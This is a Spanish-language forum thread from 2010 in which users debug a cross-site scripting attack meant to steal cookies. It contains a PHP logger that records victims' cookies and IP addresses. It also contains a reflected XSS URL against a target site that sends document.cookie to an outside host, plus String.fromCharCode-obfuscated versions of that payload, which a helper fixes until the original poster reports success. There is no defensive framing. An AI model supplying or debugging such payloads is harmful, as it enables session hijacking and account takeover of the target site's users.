XSS Help!!!

[{O_o}] · 10 Febrero 2010, 22:49 PM

chmod 777 c.php
PHP SCRIPT:

<?php
$cookie = urldecode($_GET['c']);
$fp = fopen("log.txt", "a");
$cookie = $cookie . ": ".$_SERVER['REMOTE_ADDR']." at ".date("r",time())."\n";
fwrite($fp, "$cookie \n");
fclose($fp);
header("Location: http://google.com ");
?>

XSS BUG URL:

http://victima.com?r="><script>selft.location='http://url.com/c.php?c='+document.cookie;</script>

LOG.TXT:

pero si pongo

http://victima?r="><script>selft.location='http://url.com/c.php?c=';</script>

LOG.TXT:
: x.x.x.x at Wed, 10 Feb 2010 10:56:34 -0400

Gracias!

~ Yoya ~ · 10 Febrero 2010, 22:59 PM

Tio hacerlo con el String.fromCharCode() y veras que funcionara y cuentas.

Castg! · 10 Febrero 2010, 23:00 PM

no creo q te convenga poner la url original.. :S cambiala por ****

[{O_o}] · 10 Febrero 2010, 23:02 PM

Solo la puse asi para que ustedes trataran!!!

~ Yoya ~ · 10 Febrero 2010, 23:05 PM

Tranquilo man, anda y usa String.fromCharCode(), aveces es mejor que pongas la url.

[{O_o}] · 10 Febrero 2010, 23:09 PM

No funciona tio

con el code tratat de agregarle el + document.cookie; al ejemplo que me diste a ver si te junciona.

Gracias

~ Yoya ~ · 10 Febrero 2010, 23:14 PM

No te lo puedo agregar correctamente porque no se la direccion de tu web, pon lo que pusistee y miro que hiziste mal

[{O_o}] · 10 Febrero 2010, 23:16 PM

"><script>document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 105, 109, 117, 115, 97, 46, 117, 115, 47, 99, 46, 112, 104, 112, 63, 99, 61, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 115, 99, 114, 105, 112, 116, 62))</script>

esto fue lo que puse y no salio nada

~ Yoya ~ · 10 Febrero 2010, 23:38 PM

Bueno este debe funcionar:

Código [Seleccionar]

"><script>document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 105, 109, 117, 115, 97, 46, 117, 115, 47, 99, 46, 112, 104, 112, 63, 99, 61, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62))</script>

[{O_o}] · 10 Febrero 2010, 23:49 PM

Ya mucha gracias lo hice con unicode para la url y me funciono perfectamente jijiji